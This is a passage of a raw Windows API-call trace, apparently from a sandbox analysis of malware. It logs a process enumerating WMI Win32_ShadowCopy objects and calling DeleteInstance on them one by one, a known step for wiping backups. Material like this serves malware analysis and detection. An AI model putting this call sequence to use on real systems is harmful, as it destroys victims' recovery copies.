pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90ce00 | out: pCid=0x1c90ce00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0144.755] IUnknown:Release (This=0x1be60738) returned 0x3 [0144.757] CoGetContextToken (in: pToken=0x1c90cde0 | out: pToken=0x1c90cde0) returned 0x0 [0144.757] IUnknown:AddRef (This=0x1be60730) returned 0x4 [0144.757] IUnknown:QueryInterface (in: This=0x1be60730, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cef8 | out: ppvObject=0x1c90cef8*=0x0) returned 0x80004002 [0144.757] IUnknown:Release (This=0x1be60730) returned 0x3 [0144.757] IUnknown:Release (This=0x1be60730) returned 0x2 [0144.758] CoGetContextToken (in: pToken=0x1c90d2a0 | out: pToken=0x1c90d2a0) returned 0x0 [0144.758] CoGetContextToken (in: pToken=0x1c90d1e0 | out: pToken=0x1c90d1e0) returned 0x0 [0144.758] IUnknown:AddRef (This=0x1be60730) returned 0x3 [0144.758] IUnknown:QueryInterface (in: This=0x1be60730, riid=0x1c90d320*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c90d300 | out: ppvObject=0x1c90d300*=0x1be60730) returned 0x0 [0144.758] IUnknown:Release (This=0x1be60730) returned 0x3 [0144.758] IUnknown:Release (This=0x1be60730) returned 0x2 [0144.758] IUnknown:Release (This=0x1be60730) returned 0x1 [0144.758] CoTaskMemFree (pv=0x16a900) [0144.758] CoGetContextToken (in: pToken=0x1c90dc20 | out: pToken=0x1c90dc20) returned 0x0 [0144.758] IUnknown:AddRef (This=0x1be60730) returned 0x2 [0144.758] IWbemClassObject:Get (in: This=0x1be60730, wszName="__GENUS", lFlags=0, pVal=0x1c90dd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd8c*=0, plFlavor=0x1c90dd88*=0 | out: pVal=0x1c90dd90*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90dd8c*=3, plFlavor=0x1c90dd88*=64) returned 0x0 [0144.758] IWbemClassObject:Get (in: This=0x1be60730, wszName="__PATH", lFlags=0, pVal=0x1c90dd30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd2c*=0, plFlavor=0x1c90dd28*=0 | out: pVal=0x1c90dd30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"", varVal2=0x0), pType=0x1c90dd2c*=8, plFlavor=0x1c90dd28*=64) returned 0x0 [0144.759] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"") returned 0x53 [0144.759] CoGetObjectContext (in: riid=0x1c90dcc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90dcc0 | out: ppv=0x1c90dcc0*=0x142498) returned 0x0 [0144.759] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90dce0 | out: pAptType=0x1c90dce0*=1) returned 0x0 [0144.759] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90dde8 | out: ppvObject=0x1c90dde8*=0x0) returned 0x80004002 [0144.759] IUnknown:Release (This=0x142498) returned 0x1 [0144.759] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d350 | out: ppv=0x1c90d350*=0x1be5a550) returned 0x0 [0144.760] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be5a550, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d060 | out: ppvObject=0x1c90d060*=0x0) returned 0x80004002 [0144.760] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be5a550, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d048 | out: ppvObject=0x1c90d048*=0x1be53610) returned 0x0 [0144.760] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53610, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cf50 | out: ppvObject=0x1c90cf50*=0x1be53610) returned 0x0 [0144.760] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53610, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90cfd0 | out: ppvObject=0x1c90cfd0*=0x0) returned 0x80004002 [0144.760] WbemDefPath:IUnknown:AddRef (This=0x1be53610) returned 0x3 [0144.760] CoGetContextToken (in: pToken=0x1c90cc20 | out: pToken=0x1c90cc20) returned 0x0 [0144.760] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53610, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cbe0 | out: ppvObject=0x1c90cbe0*=0x1b9376e0) returned 0x0 [0144.760] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b9376e0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90cc10 | out: pCid=0x1c90cc10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0144.761] WbemDefPath:IUnknown:Release (This=0x1b9376e0) returned 0x3 [0144.761] CoGetContextToken (in: pToken=0x1c90cbf0 | out: pToken=0x1c90cbf0) returned 0x0 [0144.761] WbemDefPath:IUnknown:AddRef (This=0x1be53610) returned 0x4 [0144.761] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53610, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cd08 | out: ppvObject=0x1c90cd08*=0x0) returned 0x80004002 [0144.761] WbemDefPath:IUnknown:Release (This=0x1be53610) returned 0x3 [0144.761] WbemDefPath:IUnknown:Release (This=0x1be53610) returned 0x2 [0144.761] WbemDefPath:IUnknown:Release (This=0x1be5a550) returned 0x0 [0144.761] WbemDefPath:IUnknown:Release (This=0x1be53610) returned 0x1 [0144.761] CoGetContextToken (in: pToken=0x1c90d920 | out: pToken=0x1c90d920) returned 0x0 [0144.761] CoGetContextToken (in: pToken=0x1c90d860 | out: pToken=0x1c90d860) returned 0x0 [0144.761] WbemDefPath:IUnknown:AddRef (This=0x1be53610) returned 0x2 [0144.762] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53610, riid=0x1c90d9a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90d980 | out: ppvObject=0x1c90d980*=0x1be53610) returned 0x0 [0144.762] WbemDefPath:IUnknown:Release (This=0x1be53610) returned 0x2 [0144.762] WbemDefPath:IUnknown:Release (This=0x1be53610) returned 0x1 [0144.762] CoGetContextToken (in: pToken=0x1c90daa0 | out: pToken=0x1c90daa0) returned 0x0 [0144.762] CoGetContextToken (in: pToken=0x1c90d9e0 | out: pToken=0x1c90d9e0) returned 0x0 [0144.762] WbemDefPath:IUnknown:AddRef (This=0x1be53610) returned 0x2 [0144.762] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53610, riid=0x1c90db20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90db00 | out: ppvObject=0x1c90db00*=0x1be53610) returned 0x0 [0144.762] WbemDefPath:IUnknown:Release (This=0x1be53610) returned 0x2 [0144.762] WbemDefPath:IUnknown:AddRef (This=0x1be53610) returned 0x3 [0144.762] WbemDefPath:IWbemPath:SetText (This=0x1be53610, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"") returned 0x0 [0144.762] WbemDefPath:IUnknown:Release (This=0x1be53610) returned 0x2 [0144.763] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90dd60 | out: puCount=0x1c90dd60*=0x2) returned 0x0 [0144.763] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c90dd60*=0x17, pszText=0x0) returned 0x0 [0144.763] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90dd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0144.763] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0144.763] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0144.763] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0144.763] IWbemClassObject:Get (in: This=0x1be60730, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0144.763] SysStringLen (param_1="root\\cimv2") returned 0xa [0144.763] IWbemClassObject:Get (in: This=0x1be60730, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0144.763] SysStringLen (param_1="root\\cimv2") returned 0xa [0144.763] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0144.763] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0144.763] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0144.763] IWbemClassObject:Get (in: This=0x1be60730, wszName="__CLASS", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0144.763] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0144.763] IWbemClassObject:Get (in: This=0x1be60730, wszName="__CLASS", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0144.763] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0144.764] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be53610, puCount=0x1c90d500 | out: puCount=0x1c90d500*=0x2) returned 0x0 [0144.764] WbemDefPath:IWbemPath:GetText (in: This=0x1be53610, lFlags=4, puBuffLength=0x1c90d500*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d500*=0x54, pszText=0x0) returned 0x0 [0144.764] WbemDefPath:IWbemPath:GetText (in: This=0x1be53610, lFlags=4, puBuffLength=0x1c90d500*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d500*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"") returned 0x0 [0144.764] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d450 | out: puCount=0x1c90d450*=0x2) returned 0x0 [0144.764] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d450*=0x17, pszText=0x0) returned 0x0 [0144.764] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d450*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0144.764] CoGetContextToken (in: pToken=0x1c90d2e0 | out: pToken=0x1c90d2e0) returned 0x0 [0144.764] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x3 [0144.764] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90ceb0 | out: ppvObject=0x1c90ceb0*=0x1b92e6f0) returned 0x0 [0144.764] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x3 [0144.764] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0144.765] IWbemClassObject:Get (in: This=0x1be60730, wszName="__GENUS", lFlags=0, pVal=0x1c90d440*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d43c*=0, plFlavor=0x1c90d438*=0 | out: pVal=0x1c90d440*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90d43c*=3, plFlavor=0x1c90d438*=64) returned 0x0 [0144.765] WbemDefPath:IWbemPath:GetText (in: This=0x1be53610, lFlags=2, puBuffLength=0x1c90d510*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d510*=0x3d, pszText=0x0) returned 0x0 [0144.765] WbemDefPath:IWbemPath:GetText (in: This=0x1be53610, lFlags=2, puBuffLength=0x1c90d510*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d510*=0x3d, pszText="Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"") returned 0x0 [0144.765] IWbemServices:DeleteInstance (in: This=0x1be444f8, strObjectPath="Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0145.812] CoTaskMemAlloc (cb=0x8) returned 0x16a900 [0145.813] IEnumWbemClassObject:Next (in: This=0x1be44788, lTimeout=-1, uCount=0x1, apObjects=0x16a900, puReturned=0x1c90de18 | out: apObjects=0x16a900*=0x1be609e0, puReturned=0x1c90de18*=0x1) returned 0x0 [0145.815] IUnknown:QueryInterface (in: This=0x1be609e0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d140 | out: ppvObject=0x1c90d140*=0x1be609e0) returned 0x0 [0145.816] IUnknown:QueryInterface (in: This=0x1be609e0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d1c0 | out: ppvObject=0x1c90d1c0*=0x0) returned 0x80004002 [0145.816] IUnknown:QueryInterface (in: This=0x1be609e0, riid=0x7fef2d6d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90cf58 | out: ppvObject=0x1c90cf58*=0x0) returned 0x80004002 [0145.817] IUnknown:AddRef (This=0x1be609e0) returned 0x3 [0145.817] CoGetContextToken (in: pToken=0x1c90ce10 | out: pToken=0x1c90ce10) returned 0x0 [0145.817] IUnknown:QueryInterface (in: This=0x1be609e0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cdd0 | out: ppvObject=0x1c90cdd0*=0x1be609e8) returned 0x0 [0145.817] IMarshal:GetUnmarshalClass (in: This=0x1be609e8, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90ce00 | out: pCid=0x1c90ce00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0145.817] IUnknown:Release (This=0x1be609e8) returned 0x3 [0145.818] CoGetContextToken (in: pToken=0x1c90cde0 | out: pToken=0x1c90cde0) returned 0x0 [0145.818] IUnknown:AddRef (This=0x1be609e0) returned 0x4 [0145.818] IUnknown:QueryInterface (in: This=0x1be609e0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cef8 | out: ppvObject=0x1c90cef8*=0x0) returned 0x80004002 [0145.818] IUnknown:Release (This=0x1be609e0) returned 0x3 [0145.818] IUnknown:Release (This=0x1be609e0) returned 0x2 [0145.818] CoGetContextToken (in: pToken=0x1c90d2a0 | out: pToken=0x1c90d2a0) returned 0x0 [0145.818] CoGetContextToken (in: pToken=0x1c90d1e0 | out: pToken=0x1c90d1e0) returned 0x0 [0145.818] IUnknown:AddRef (This=0x1be609e0) returned 0x3 [0145.819] IUnknown:QueryInterface (in: This=0x1be609e0, riid=0x1c90d320*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c90d300 | out: ppvObject=0x1c90d300*=0x1be609e0) returned 0x0 [0145.819] IUnknown:Release (This=0x1be609e0) returned 0x3 [0145.819] IUnknown:Release (This=0x1be609e0) returned 0x2 [0145.819] IUnknown:Release (This=0x1be609e0) returned 0x1 [0145.819] CoTaskMemFree (pv=0x16a900) [0145.819] CoGetContextToken (in: pToken=0x1c90dc20 | out: pToken=0x1c90dc20) returned 0x0 [0145.819] IUnknown:AddRef (This=0x1be609e0) returned 0x2 [0145.820] IWbemClassObject:Get (in: This=0x1be609e0, wszName="__GENUS", lFlags=0, pVal=0x1c90dd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd8c*=0, plFlavor=0x1c90dd88*=0 | out: pVal=0x1c90dd90*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90dd8c*=3, plFlavor=0x1c90dd88*=64) returned 0x0 [0145.820] IWbemClassObject:Get (in: This=0x1be609e0, wszName="__PATH", lFlags=0, pVal=0x1c90dd30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd2c*=0, plFlavor=0x1c90dd28*=0 | out: pVal=0x1c90dd30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"", varVal2=0x0), pType=0x1c90dd2c*=8, plFlavor=0x1c90dd28*=64) returned 0x0 [0145.820] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"") returned 0x53 [0145.820] CoGetObjectContext (in: riid=0x1c90dcc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90dcc0 | out: ppv=0x1c90dcc0*=0x142498) returned 0x0 [0145.821] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90dce0 | out: pAptType=0x1c90dce0*=1) returned 0x0 [0145.821] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90dde8 | out: ppvObject=0x1c90dde8*=0x0) returned 0x80004002 [0145.821] IUnknown:Release (This=0x142498) returned 0x1 [0145.823] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d350 | out: ppv=0x1c90d350*=0x1be5a610) returned 0x0 [0145.823] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be5a610, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d060 | out: ppvObject=0x1c90d060*=0x0) returned 0x80004002 [0145.824] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be5a610, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d048 | out: ppvObject=0x1c90d048*=0x1be536d0) returned 0x0 [0145.824] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be536d0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cf50 | out: ppvObject=0x1c90cf50*=0x1be536d0) returned 0x0 [0145.824] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be536d0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90cfd0 | out: ppvObject=0x1c90cfd0*=0x0) returned 0x80004002 [0145.824] WbemDefPath:IUnknown:AddRef (This=0x1be536d0) returned 0x3 [0145.824] CoGetContextToken (in: pToken=0x1c90cc20 | out: pToken=0x1c90cc20) returned 0x0 [0145.824] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be536d0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cbe0 | out: ppvObject=0x1c90cbe0*=0x1b9377e0) returned 0x0 [0145.825] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b9377e0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90cc10 | out: pCid=0x1c90cc10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0145.825] WbemDefPath:IUnknown:Release (This=0x1b9377e0) returned 0x3 [0145.825] CoGetContextToken (in: pToken=0x1c90cbf0 | out: pToken=0x1c90cbf0) returned 0x0 [0145.825] WbemDefPath:IUnknown:AddRef (This=0x1be536d0) returned 0x4 [0145.825] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be536d0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cd08 | out: ppvObject=0x1c90cd08*=0x0) returned 0x80004002 [0145.825] WbemDefPath:IUnknown:Release (This=0x1be536d0) returned 0x3 [0145.825] WbemDefPath:IUnknown:Release 